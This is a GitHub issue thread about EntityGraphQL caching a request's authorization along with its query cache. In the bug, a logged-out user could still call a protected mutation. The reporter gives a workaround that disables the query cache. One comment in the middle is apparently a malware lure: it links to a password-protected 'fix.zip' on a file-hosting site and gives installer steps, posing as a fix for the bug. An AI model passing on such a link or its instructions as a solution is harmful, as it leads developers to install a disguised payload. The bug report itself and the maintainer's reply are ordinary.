### ISSUE TITLE
Authorization cached for requests

### ISSUE THREAD

**Issue by Mathiasbjensen** [EntityGraphQL/EntityGraphQL#398]
While I was working on implementing and testing ASP.NET Authorization with this library, I noticed that logging out didn't seem to affect my endpoints as I would expect.

Logging in and calling a Mutation which required Authorization worked just fine. And if I had not yet logged in, it would also correctly send an unauthorized response. 
However, if I logged in, called my Mutation, then logged out and called the mutation again, I was still able to call my Mutation despite the fact that it required Authorization, and my User being Unauthorized and have no Claims at this point.

It seemed like the requests were cached, including the Authorization of the request.

This meant that anyone calling the Mutation with the same input would now also be Authorized (for a period of time at least), which is a security Issue.

I fixed this issue by explicitly disabling QueryCache, which is probably not ideal, but it's critical to not cache the Authorization part of my request.
I applied this fix when Mapping GraphQL:

```
        app.MapGraphQL<rDbContext>(options: new EntityGraphQL.Schema.ExecutionOptions
        {
            EnableQueryCache = false
        });
```

And Authorization is now working as expected. 

This is probably worth looking into, as I don't believe this should be the default behavior. I was also not able to find anything on this in the documentation.

**Comment by TrymenT-AlphA** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lukemurray** [comment]
Good find (well not good that it made it in there). Would you mind lending a hand and confirming the PR resolves this for you?
